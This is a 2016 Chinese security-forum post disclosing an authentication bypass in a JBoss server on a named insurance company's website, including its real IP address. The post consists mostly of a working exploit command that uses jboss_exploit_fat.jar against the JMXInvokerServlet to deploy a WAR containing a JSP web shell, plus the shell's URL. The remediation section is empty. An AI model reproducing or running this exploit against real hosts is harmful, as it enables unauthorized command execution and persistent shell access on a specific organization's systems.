HanDs
管理员

[7月漏洞公开] 华安保险某站认证绕过命令执行可Shell 



华安保险某站认证绕过执行

详细说明:

华安保险某站认证绕过执行

漏洞证明:

http://58.251.33.183:8080/

code 区域
http://58.251.33.183:8080/invoker/JMXInvokerServlet



利用代码:

java -jar jboss_exploit_fat.jar -i http://58.251.33.183:8080/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store jasmine.war cmd .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean

http://58.251.33.183:8080/jasmine/cmd.jsp

1.png

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
华安 保险 认证 绕过 命令 执行 S he ll
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复